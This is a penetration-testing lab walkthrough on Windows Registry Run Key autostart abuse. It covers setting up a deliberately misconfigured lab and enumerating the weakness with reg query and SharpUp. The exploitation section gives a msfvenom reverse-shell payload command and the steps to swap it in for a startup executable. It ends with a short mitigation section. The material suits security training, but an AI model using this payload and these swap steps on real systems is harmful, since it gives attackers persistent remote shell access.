Logon Autostart Execution through Registry Run Keys is a Windows feature that enables specific programs or scripts to launch automatically when a user logs into the system. This feature allows these programs or scripts to launch automatically without any manual action from the user when the operating system starts up.
Attackers may exploit the Logon Autostart Execution feature by inserting malicious software into the Registry Run Keys. This enables the malicious code to automatically launch during system startup, potentially granting it elevated privileges.
- Open a PowerShell with local Administrator privileges and run the following command to create a new folder:
mkdir "C:\Program Files\NickvourdSrv"
Outcome:
-
Download the file NCV_AMD64.exe to the 'C:\Program Files\NickvourdSrv' directory.
-
Modify the permissions of the 'C:\Program Files\NickvourdSrv' directory to allow Full Control for all users:
- Open a PowerShell with local Administrator privileges and run the following command to edit registry key:
regedit
- Navigate to
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runand create new String ValueNickvourdSrv:
- Modify the key string named
NickvourdSrvwith value dataC:\Program Files\NickvourdSrv\NCV_AMD64.exe:
To set up the lab with the 'Logon Autostart Execution (Registry Run Keys)' scenario use the custom PowerShell script named LogonAutostartExecutionRegistryRunKeys.ps1.
Open a PowerShelll with local Administrator privileges and run the script:
.\LogonAutostartExecutionRegistryRunKeys.ps1
Outcome:
To perform manual enumeration and identify whether a Windows workstation is vulnerable to the RegistryAutoruns issue, you can use the following command from a command prompt:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Outcome:
To run the SharpUp tool and perform an enumeration of the RegistryAutoruns vulnerability, you can execute the following command with appropriate arguments:
SharpUp.exe audit RegistryAutoruns
Outcome:
ℹ️ Moreover, you can use SharpUp.exe audit to perform a comprehensive enumeration of all misconfigurations vulnerabilities on the specified machine.
- Use msfvenom to generate a malicious executable (exe) file that can be executed via the booting of the victim's machine:
msfvenom -p windows/x64/shell_reverse_tcp lhost=eth0 lport=1234 -f exe > shell.exe
-
Transfer the malicious executable file to victim's machine.
-
Move the malicious executable file to 'C:\Program Files\NickvourdSrv'.
-
Rename the 'NCV_AMD64.exe' to 'NCV_AMD64.bak'.
-
Rename the malicious exe (shell.exe) to 'NCV_AMD64.exe'.
Outcome:
-
Open a listener on your Kali machine.
-
Reboot the victim's machine and login as Adminstrator:
- Verify the reverse shell on your Kali machine:
To defend against Registry auto-run vulnerabilities, adjust permissions on folders containing executables initiated through this mechanism. This limits unauthorized access and strengthens security measures.
Moreover, to delete a specific auto-run key value from the Windows Registry, you can use the following command in Command Prompt with local Administrator privileges:
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "<KeyName>" /f